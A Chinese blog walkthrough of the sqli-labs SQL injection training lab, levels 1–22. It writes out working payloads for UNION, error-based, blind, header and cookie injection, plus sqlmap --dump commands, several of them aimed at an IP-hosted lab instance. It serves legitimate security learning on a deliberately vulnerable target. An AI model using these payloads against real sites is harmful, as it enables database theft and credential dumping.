sqli-labs(1~22)

最新推荐文章于 2024-05-22 02:08:08 发布
最新推荐文章于 2024-05-22 02:08:08 发布
阅读量961 收藏
点赞数
文章标签: mysql 数据库 web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Osumail/article/details/105966352
版权


title: sqli-labs(1~22)

关注我的博客,访问更多内容!

sqli-labs网址链接

less-1

方法一:
输入?id=1正常显示,输入?id=1’报错,输入?id=1’ and 1='1,正常显示,得知是字符型注入,
爆字段: ?id=1' order by 3--+
查看回显内容:?id=-1‘ union select 1,2,3--+
爆库名,版本号:?id=-1' union select 1,database(),version()
爆所有数据库:?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
爆表名:?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'%23
爆列名:?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'%23
爆数据:?id=-1' union select 1,2,group_concat(id,username,password) from users%23

方法二:
借助sqlmap软件直接爆破
最终payload:./sqlmap.py -u "http://43.247.91.228:84/Less-1/?id=1" -D security -T users --dump
得到的数据结果如下:
获取数据

less-2

输入1’,根据报错信息确定输入的内容被原封不动的带入到数据库中,输入?id=1 and 1=1,显示正常,得知是数字型注入,将单引号去掉,其他方法步骤和less-1一样,不再重复了。
直接上爆数据payload:?id=-1 union select 1,2,group_concat(id,username,password) from users%23
sqlmap同样可以直接爆破,payload后的参数和less-1一样。

less-3

单引号报错,输入1’,根据报错信息发现输入的内容后有’),想到应该以 ‘) 来闭合表达式,脑补一下输入1后的sql语言,形如select … from … where id=(‘1’) …,在第一题中id=1的后面加上’),其他步骤和方法和less-1一样,不再重复了。
直接上爆数据payload:?id=-1') union select 1,2,group_concat(id,username,password) from users%23
sqlmap同样可以直接爆破,payload后的参数和less-1一样。

less-4

双引号报错,输入1’,显示正常,输入1’’,根据报错信息发现输入的内容后有"),想到应该以 ‘’) 来闭合表达式,脑补一下输入1后的sql语言,形如select … from … where id=(’‘1’’) …,在第一题中id=1的后面加上’’),其他步骤和方法和less-1一样,不再重复了。
直接上爆数据payload:?id=-1") union select 1,2,group_concat(id,username,password) from users%23
sqlmap同样可以直接爆破,payload后的参数和less-1一样。

less-5

输入之前的内容发现不再显示数据信息,应该是报错注入或者盲注。
输入?id=1’报错,根据sql语法错误提示,得知是字符型报错注入。
爆库名:?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)%23
爆表名:?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)%23
爆列名:?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)%23
爆数据:?id=1' and updatexml(1,concat(0x7e,(select group_concat(id,username,password) from users),0x7e),1)%23
sqlmap同样可以直接爆破,payload后的参数和less-1一样。

less-6

与第5关类似,只不过这一关使用的是" “的方式闭合字符串,我们只需要将?id=1’ 改为 ?id=1”,后面的参数不变,其余过程不再赘述,和less-5一样。
sqlmap同样可以直接爆破,payload后的参数和less-1一样。

less-7

输入?id=1'报错,经几次测试后发现只有在后面添加 ’ 会报错,但是这次后台对报错进行了处理,所有错误都显示语法错误。
我们利用单引号进行进一步注入:?id=1' and sleep(3)--+还是报错,猜测是不是过滤了某些字符,
测试过滤字符:?id=1' and sleep(3) or 1='1发现显示正常了,发现后台过滤了的注释字符,通过盲注一步步判断
判断数据库的第一个字符是s:?id=1' and ascii(substr((select database()),1,1))=115 and 1='1
显示正常,说明数据库的第一个字符的acsll值为115,即为s。
一步步尝试,过程比较麻烦,使用脚本比较方便。
可直接sqlmap跑一下,payload后的参数和less-1一样。

less-8

这一个和less-7差不多,把报错全部过滤了,如果错误就没有返回,正确就返回you are in……,而其注释符没有被过滤,我们就可以利用基于布尔的盲注进行测试:
判断数据库的第一个字符是s:?id=1' and ascii(substr((select database()),1,1))=115--+
一步步尝试,过程比较麻烦,使用脚本比较方便。
可直接sqlmap跑一下,payload后的参数和less-1一样。

less-9

无论输入什么都是返回相同的内容,报错注入无效了,尝试一下时间盲注:
判断是否有注入:?id=1' and sleep(3)--+,停留了3s后刷新,说明存在注入点。
其他的和less-7差不多,只是在最后要加上and sleep(3)--+来判断对错。
判断数据库的第一个字符是s:?id=1' and ascii(substr((select database()),1,1))=115 and sleep(3)--+
一步步尝试,过程比较麻烦,使用脚本比较方便。
可直接sqlmap跑一下,payload后的参数和less-1一样。

less-10

和less-9类似,只是闭合符号变成了 ‘’ ,
检查是否存在注入:?id=1'' and sleep(3)--+,停留了3s后刷新,说明存在注入点。其他的和less-9一样了,
判断数据库的第一个字符是s:?id=1'' and ascii(substr((select database()),1,1))=115 and sleep(3)--+
一步步尝试,过程比较麻烦,使用脚本比较方便。
可直接sqlmap跑一下,payload后的参数和less-1一样。

less-11

方法一:
页面显示变了,不再是get方式传递参数,改为post方式传参,通过尝试发现闭合方式为 ’ ,先使用万能钥匙登陆,登陆成功。
万能密码登陆
查看是否有注入点,爆字段试试,
爆字段
开始尝试order by 3#提示错误,最终确定order by 2#正常,接着判断回显内容,并爆数据库,
爆数据库
爆表名,
爆表名
爆列名,
在这里插入图片描述
爆数据,
在这里插入图片描述
方法二:
还可以借助sqlmap软件直接爆破
最终payload:./sqlmap.py -u "http://localhost/sqli-labs/Less-11/" --data="uname=*&passwd=*" -D security -T users --dump

less-12

根据题目提示闭合方式应该为 “) ,输入万能钥匙,果然登陆成功,
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wD2l8bMA-1588816961768)(https://s2.ax1x.com/2019/03/06/kvJIw4.png)]
其他的和less-11一样,只是闭合方式变成了”),其他的就不赘述了。下面直接上爆数据的截图,
爆数据
也可直接sqlmap跑一下,payload后的参数和less-11一样。

less-13

根据提示闭合方式应该是 ') ,但是利用万能钥匙成功登陆后并不显示有用信息,尝试报错注入,竟然成功了。
爆数据库
接着爆表名:
爆表名
接着爆列名:
爆表名
最后爆数据:
爆数据
也可直接sqlmap跑一下,payload后的参数和less-11一样。

less-14

通过尝试发现闭合方式为 " ,其他方法和less-13一样,不再赘述,下面直接上爆数据的截图,
爆数据
也可直接sqlmap跑一下,payload后的参数和less-11一样。

less-15

根据提示闭合方式为 ’ ,但无论输入什么,都不再输出任何信息,只能尝试盲注,判断库名的第一个字符是否为s:
判断库名的第一个字符是s
返回登陆成功,说明库名的第一个字符为s,反之则返回登陆失败。
接着要一步步尝试,过程比较麻烦,使用脚本比较方便。

less-16

通过尝试发现闭合方式为 "),其他和less-15一样,只不过改变了闭合方式,直接上判断库名第一个字符是否为s的截图
判断库名的第一个字符为s
返回登陆成功,说明说明库名的第一个字符为s,反之则返回登陆失败。接着要一步步尝试,过程比较麻烦,使用脚本比较方便。

less-17

利用万能钥匙登陆,竟然被嘲讽了。发现页面显示重置密码,sql语句应该类似于update table set password='xxx' where username = 'xxx',需要我们先知道一个username,前几关爆数据的时候username里都有Dumb,我们输入username为Dumb,密码为123456后提示密码更改成功,然后进一步尝试,利用用户名为Dumb在密码处进行注入,
在密码栏里写入:1' order by 3# ,报错了。试一下报错注入,
在密码栏里输入:1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#,成果爆出库名,
爆表名:密码栏输入-1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)#,
爆列名:-1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'),0x7e),1)#

sqlmap也可以跑出来数据库和表,参数的payload:--data="uname=admin&passwd=*" -D security -T tables --dump

less-18

根据提示应该是UA注入,查看源代码,发现输入内容都有审查函数,不存在注入,先试一下UA注入。
根据前几关知道有一组数据为admin-admin,所以在username和password处都输入admin,成功登陆,看到提示信息,然后bp抓包后把User-Agent后的内容改为 1’ 运行,报错,说明存在注入,而且源代码里发现很重要的一条语句 INSERT INTO table_name (‘uagent’,‘ip_address’,‘username’) VALUES (’$uagent’,’$IP’,’$uname’),需要构造注入语句,还要满足闭合条件,
爆库名:' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or 1='1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7cCoL4OZ-1588816961784)(https://s2.ax1x.com/2019/03/07/kxQFB9.png)]
成功得到库名,其他步骤都类似了,不再赘述。

less-19

与less-18类似,根据提示是Referer注入,成功登陆后bp抓包,修改Referer内容。
爆库名:' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or 1='1
修改Referer
成功得到库名,其他步骤都类似了,不再赘述。

less-20

与less-19类似,根据提示是Cookie注入,成功登陆后bp抓包,修改Cookie内容。
爆库名:uname=' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or 1='1
修改Cookie
成功得到库名,其他步骤都类似了,不再赘述。

less-21

按less-20的方法成功登陆后,发现页面和less-20有一些不同,
base64编码
uname后的数据加密了,看到加密末尾的 = ,猜测应该是base64编码,到网上将admin进行base64加密,加密结果果然一样。
需要把注入字段进行base64加密,其他方法和less-20一样。
爆库注入字段:uname=' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or 1='1
注入字段base64编码:uname=JyBvciB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpLDEpIG9yIDE9JzE=
成功登陆后修改Cookie内容,
修改Cookie,并进行base64编码
成功得到库名,其他步骤都类似了,不再赘述。

less-22

和less-21类似,根据题目提示闭合方式是 " ,其他方法和less-21一样。
爆库注入字段:uname=" or updatexml(1,concat(0x7e,(select database()),0x7e),1) or 1="1
注入字段base64编码:uname=IiBvciB1cGRhdGV4bWwoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpLDEpIG9yIDE9IjE=
成功登陆后修改Cookie内容,
修改Cookie并进行base64编码
成功得到库名,其他步骤都类似了,不再赘述。

sqli-labs(1~22)关卡全部完成了,如有错误,欢迎在评论中指出!

Osumail
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql-lib 闯关课程第一课
tmgt的博客
04-25 2991
sql-libs是github上的一个专注于sql注入的平台,目前网上关于这个平台的资源很多,我的这个系列主要是分享与总结我得心得,下面开始吧 sql-libs下载地址 链接: sql-libs下载地址. less1 我采用的环境是phpstudy集成环境,网上的教程很多,可以自行寻找搭建。我搭建的环境是php5.2.17+Apache2.4.39+Mysql8.0环境,在php5.2环境中mag...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
Sqli-lab教程-史上最全详解(1-22通关)
qq_52364123的博客
04-10 8021
sql注入集合
sqli-labs通关-------04lesson-double_quotes
枯藤闲画云
05-31 281
到这个我们发现输入单引号和双引号好像都没啥反应http://127.0.0.1:90/sqli-labs/Less-4/?id=1’) ????????? 所以我们输入一个转义符进去,报错了。 为啥输入转移符 1.因为我碰到了输错了。。。。。 2.我发现好像换别的字符不行。。 3.so转移符可以进去把sql语句的字符串特殊字符转义,于是赶得巧了 ...
SQL注入基础步骤及SQLMap工具使用(一)
gaogzhen的博客
06-28 8834
SQL注入基础步骤及SQLMap工具使用(一) 测试环境为VMware WorkStation虚拟机 一、环境搭建 (一)、phpstudy2018集成环境安装使用 安装使用,自行百度,下载地址:官网地址 1.http://phpstudy.php.cn/ (二)、SQL注入源码 百度网盘: 1.链接:https://pan.baidu.com/s/1B0VSwXk6JnZbB...
sql-liab--Less5
weixin_43803070的博客
07-19 393
1.报表名字 http://43.247.91.228:84/Less-5/?id=1%27%20union%20select%20count(*),concat(0x3a,0x3a,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%203,1),0x3...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
jeakinscheung-sqli-labs-php7-master.zip
03-16
sqli创建数据库连接发现连接不了,这种原因是现在大部分人用的php7,原版的sqli只支持php5.
SQL注入——Less-1
一凡凡凡人的博客
09-14 1876
                 声明:本实验教程仅供研究学习使用,请勿用于非法用途,违者一律自行承担所有风险!!!   打开主页进入第一关,提示输入参数id及它的值, 传入参数id=1后,我们会发现这个页面会根据传入的id查询到对应的用户及用户密码 我们可以通过查看数据库进行验证 这样我们就可以推断出PHP执行的SQL语句的功能是从数据库中查询出的信息为我们传入的id为1的...
SQL注入之报错注入的一些随笔
郁离歌丶的博客
03-21 4455
0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...
SQLI-LABS修炼笔记(一)
郁离歌丶的博客
03-03 1094
写在前面:作为一个萌新,想自己搭一个sqli-labs,中间历经了无数艰难,我win10系统用的是xampp,结果搭起来发现php版本太高了,xampp用的是php7以上的,然后自己用docker搭了一个,在ubantu用lamp搭了一个,又用phpstudy搭了一个,在自己服务器上弄了一个233333不说了进入正题。 less-11.找到注入点,发现报错回显。http://43.247.91.2...
sqli-labs详细全解31-40
qq_38415434的博客
01-11 923
sqli-labs详细全解31-40 第三十一关: login.php 只对第一个参数进行了检测,而第二个参数并没有进行过滤。 payload:id=2&id=1") and 1=12-- - 第三十二关: f
SQLI-LABS修炼笔记(二)
郁离歌丶的博客
03-04 970
写在前面:今天的重点是盲注。首先介绍一下sql注入截取字符串常用函数有三大法宝。mid(),substr(),left()1.mid()函数MID(column_name,start[,length])如: str="123456" mid(str,2,1) 结果为2Sql用例:(1)MID(DATABASE(),1,1)>’a’,查看数据库名第一位,MID(DATABASE(),2,1)查...
SQLi-Labs1~65关通关攻略
Clannad的博客
10-30 8609
文章目录1~10Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8Less-9Less-1011~20Less-11Less-12Less-13Less-14Less-15Less-16Less-17Less-18Less-19Less-2021~30Less-21Less-22Less-23Less-24Less-25Less-26Less-27Le...
sql-labs page1 (1~20)解题过程记录
小锤队长的博客
08-09 1451
目录 Less1:(基于错误的GET单引号字符型注入) less 2:(GET型整型注入) less 3:(基于错误的GET单引号变形字符型注入) less 4:(基于错误的GET双引号字符型注入) less 5:(双注入GET单引号字符型注入) less 6:(双注入GET双引号字符型注入) less 7:(导出文件GET字符型注入) less 8:(布尔型单引号GET盲注...
SQL注入练习
热门推荐
单核CPU的小朋友的博客
12-20 3万+
第一关 题目链接:http://43.247.91.228:84/Less-1 首先进行注入点测试。 通过报错我们知道这个是mysql数据库,而且使用单引号闭合,后台语句估计是 Select username from ‘{$id}’; 然后我们使用order by测试数据库当前列数。 接下来使用union查询来判断页面可回显的点。 我们通过联合查询来查看数据库的名字以及一些信息。 命令:1...
sqli-labs 1-22闯关
小龙在线
09-21 399
系统函数 mysql> select version(); +-----------+ | version() | +-----------+ | 5.7.25 | +-----------+ 1 row in set (0.00 sec) mysql> select user(); +----------------+ | user() | +----------------+ | root@localhost | +----------------+ 1 row in
【MySQL精通之路】SQL优化(1)-查询优化(1)-WHERE子句
最新发布
Anakki的博客
05-22 495
与PRIMARY KEY或UNIQUE索引上的WHERE子句一起使用的表,其中所有索引部分都与常量表达式进行比较,并定义为NOT NULL。由于MySQL会自动进行类似的优化,因此您通常可以避免这项工作,并将查询保留为更易于理解和维护的形式。因为MySQL优化器的开发工作还在进行中,所以这里并没有记录MySQL优化器所有的优化。您可能会试图重写查询以加快算术运算,同时牺牲可读性。,这有助于简化join连接。有关更多信息和示例,请参见“有关更多信息,请参见“空表或只有一行的表。
sqli-labs通关1-5
09-03
- *3* [Sqli-labs通关全解---关于Sqli-lab--1](https://blog.csdn.net/cyynid/article/details/128629421)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值